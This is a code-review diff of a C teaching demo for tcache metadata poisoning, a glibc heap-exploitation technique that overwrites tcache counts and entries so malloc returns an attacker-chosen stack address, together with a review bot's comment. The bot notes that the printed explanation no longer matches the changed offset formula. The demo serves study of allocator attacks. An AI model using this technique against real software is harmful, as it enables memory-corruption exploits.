|
2 | 2 | #include <stdint.h> |
3 | 3 | #include <stdio.h> |
4 | 4 | #include <stdlib.h> |
| 5 | +#include <unistd.h> |
5 | 6 |
|
6 | 7 | // Tcache metadata poisoning attack |
7 | 8 | // ================================ |
@@ -35,23 +36,25 @@ int main() { |
35 | 36 | "metadata chunk."); |
36 | 37 | uint64_t *victim = malloc(0x10); |
37 | 38 | printf("Victim chunk is at: %p.\n\n", victim); |
| 39 | + puts("Now freeing it will lead to the allocation of the metadata on heap"); |
| 40 | + free(victim); |
38 | 41 |
|
39 | | - long metadata_size = sizeof(struct tcache_metadata); |
40 | | - long rounded_metadata_size = metadata_size & ~(HEADER_SIZE-1); // round it down |
41 | 42 | printf("Next we have to calculate the base address of the metadata struct.\n" |
42 | 43 | "The metadata struct itself is %#lx bytes in size. Additionally we\n" |
43 | 44 | "have to subtract the header of the victim chunk (so an extra 0x10\n" |
44 | 45 | "bytes).\n", |
45 | 46 | sizeof(struct tcache_metadata)); |
46 | 47 | struct tcache_metadata *metadata = |
47 | | - (struct tcache_metadata *)((long)victim - rounded_metadata_size - HEADER_SIZE); |
| 48 | + (struct tcache_metadata *)((long)victim + 2*HEADER_SIZE); |
48 | 49 | printf("The tcache metadata is located at %p.\n\n", metadata); |
49 | 50 |
|
50 | 51 | puts("Now we manipulate the metadata struct and insert the target address\n" |
51 | 52 | "in a chunk. Here we choose the second tcache bin.\n"); |
52 | 53 | metadata->counts[1] = 6; |
53 | 54 | metadata->entries[1] = &stack_target; |
54 | 55 |
|
| 56 | + char c; read(0, &c, 1); |
| 57 | + |
55 | 58 | uint64_t *evil = malloc(0x20); |
56 | 59 | printf("Lastly we malloc a chunk of size 0x20, which corresponds to the\n" |
57 | 60 | "second tcache bin. The returned pointer is %p.\n", |
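Review bot: The explanation printed at new lines 42–46 still describes the removed computation — "subtract the header of the victim chunk (so an extra 0x10 bytes)" — while new line 48 now computes the metadata address as `(long)victim + 2*HEADER_SIZE`, so the program narrates one formula and executes another. Change the message to match the code, e.g. replace the two middle lines with `"The metadata struct is %#lx bytes in size; here it is assumed to sit\n" "right behind the victim chunk, i.e. at victim + 2*HEADER_SIZE.\n"`. That placement is a layout assumption the hunk does not justify: in stock glibc tcache_init() runs from the first malloc, so tcache_perthread_struct normally precedes the first user chunk rather than following it — if this demo targets a specific glibc build or a patched allocator, a comment on line 48 naming it would keep the offset from silently breaking elsewhere. The `read(0, &c, 1)` on new line 56 discards its return value and has no comment; `(void)read(0, &c, 1); // pause so a debugger can be attached` would make both the intent and the deliberate ignore explicit. `main` continues past the end of the hunk.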
|